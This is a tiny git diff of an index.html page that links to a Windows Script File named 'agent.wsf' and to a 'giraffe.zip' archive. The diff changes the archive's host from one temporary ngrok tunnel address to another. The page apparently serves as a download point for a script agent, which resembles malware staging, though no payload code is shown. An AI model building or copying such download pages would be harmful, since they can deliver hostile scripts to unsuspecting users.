--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://9f4c-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://ea22-2a00-1370-817a-a600-962-823f-4c-10c9.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
